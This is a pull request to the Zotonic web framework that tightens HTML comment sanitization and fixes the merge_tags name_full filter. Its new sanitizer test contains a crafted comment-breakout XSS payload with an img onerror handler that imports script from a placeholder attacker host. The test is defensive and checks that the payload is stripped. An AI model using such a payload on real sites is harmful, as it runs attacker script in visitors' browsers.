### PR TITLE
core: stricter HTML sanitizier. Fix for merge_tags filter.

### DIFF
--- a/apps/zotonic_core/src/support/z_expression.erl
+++ b/apps/zotonic_core/src/support/z_expression.erl
@@ -142,12 +142,12 @@ eval1({expr, Op, Left, Right}, Vars, Options, Context) ->
         Context);
 eval1({expr, Op, Expr}, Vars, Options, Context) ->
     template_compiler_operators:Op(eval1(Expr, Vars, Options, Context), z_template_compiler_runtime, Context);
-eval1({variable, Name}, Vars, _Options, Context) ->
+eval1({variable, Name}, Vars, Options, Context) ->
     case z_template_compiler_runtime:find_value(Name, Vars, #{}, Context) of
         undefined ->
             RscId = z_template_compiler_runtime:find_value(<<"id">>, Vars, #{}, Context),
             Id = m_rsc:rid(RscId, Context),
-            m_rsc:p(Id, Name, Context);
+            p(Id, Name, Options, Context);
         Value ->
             Value
     end;
@@ -253,6 +253,8 @@ find_rsc_prop(V, [ {expr, _} = E | Ks ], Vars, Options, Context) ->
     end,
     find_value_1(V1, Ks, Vars, Options, Context).
 
+p(undefined, _Prop, _Options, _Context) ->
+    undefined;
 p(Id, Prop, Options, Context) ->
     case proplists:get_value(p, Options) of
         F when is_function(F, 3) ->

--- a/apps/zotonic_core/test/z_sanitize_tests.erl
+++ b/apps/zotonic_core/test/z_sanitize_tests.erl
@@ -57,6 +57,15 @@ zmedia_test() ->
         <<"align">> := <<"block">>
     } = jsxrecord:decode(<<"{", JSON/binary, "}">>).
 
+comment_test() ->
+    Context = z_context:new(zotonic_site_testsandbox),
+    In = <<"<!--data-mce-selected=\"x\"->\"><img src onerror=import('//attacker.com')>-->">>,
+    Out = <<>>,
+    ?assertEqual(Out, z_sanitize:html(In, Context)),
+    In2 = <<"<!-- an innocent comment -->">>,
+    Out2 = In2,
+    ?assertEqual(Out2, z_sanitize:html(In2, Context)).
+
 csv_test() ->
     sanitize_csv(<<"1.0,2,3,\"4\",-1,-1+3\n">>, <<"\"1.0\",\"2\",\"3\",\"4\",\"-1\",\"'-1+3\"\r\n">>),
     sanitize_csv(<<"1.0;2;3;\"4\";-1;-1+3\n">>, <<"\"1.0\";\"2\";\"3\";\"4\";\"-1\";\"'-1+3\"\r\n">>),

--- a/apps/zotonic_mod_base/src/filters/filter_merge_tags.erl
+++ b/apps/zotonic_mod_base/src/filters/filter_merge_tags.erl
@@ -169,7 +169,7 @@ p(Id, Country, Context) when
         P -> m_l10n:country_name(P, Context)
     end;
 p(Id, <<"name_full">>, Context) ->
-    {Name, _} = z_template:render_to_iolist("_name.tpl", Id, Context),
+    {Name, _} = z_template:render_to_iolist("_name.tpl", [ {id, Id} ], Context),
     iolist_to_binary(Name);
 p(Id, Prop, Context) ->
     m_rsc:p(Id, Prop, Context).


### PR DESCRIPTION
### Description

Remove HTML comments if they contain a `<` or `>` character.
This to protect faulty HTML editors.

Fix for `name_full` rendering with the `merge_tags` filter.

### Checklist

- [ ] documentation updated
- [x] tests added
- [ ] no BC breaks
